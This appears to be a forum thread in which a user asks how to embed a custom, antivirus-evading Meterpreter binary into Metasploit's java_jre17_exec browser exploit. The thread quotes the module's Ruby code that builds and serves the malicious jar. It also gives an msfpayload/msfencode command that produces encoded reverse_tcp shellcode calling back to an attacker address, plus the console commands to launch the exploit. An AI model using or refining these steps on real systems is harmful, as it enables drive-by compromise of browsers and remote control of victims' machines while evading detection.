java_jre17_exec custom applet
Hello BT!
I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.
Here's the exploit:
Code:
/opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb
The interesting lines are:
Code:
p = regenerate_payload(cli)
jar = p.encoded_jar
paths.each do |path|
  1.upto(path.length - 1) do |idx|
    full = path[0,idx].join("/") + "/"
    if !(jar.entries.map{|e|e.name}.include?(full))
      jar.add_file(full, '')
    end
  end
  fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
  data = fd.read(fd.stat.size)
  jar.add_file(path.join("/"), data)
  fd.close
  #jar.each do |num| --------- tried to see what the jar array contains, but it doesn't show up in the console. Am I doing it wrong?
  #puts num
  #end
end
print_status("Sending Applet.jar")
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
I think "jar.pack" is the final result.
So I have two options:
1) Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2) Create my own jar and replace it with "jar.pack".
Do you have some ideas?
Thanks.
Re: java_jre17_exec custom applet
So I've heard about generic/custom and thought it would be a nice idea to use it with java_jre17_exec:
I've generated my shellcode:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.132.128 LPORT=1234 R | msfencode -a x86 -c 1 -e x86/shikata_ga_nai -t c | tr -d '"' | tr -d '\n' > /root/meter.shell
use exploit/multi/browser/java_jre17_exec
set PAYLOAD generic/custom
set PAYLOADFILE /root/meter.shell
exploit
[-] Exploit failed: Could not locate a compatible payload for Java/["java"]
Why?
Another question:
I'm using PyWin to create a FUD meterpreter binary.
1) How could I generate shellcode from my binary so that I could use it with generic/custom along with java_jre17_exec? //later, found a Perl script which does it.
2) Will I get an established connection in the java_jre17_exec exploiting session if I use my custom binary? Or should I open another session using multi/handler?
Thank you.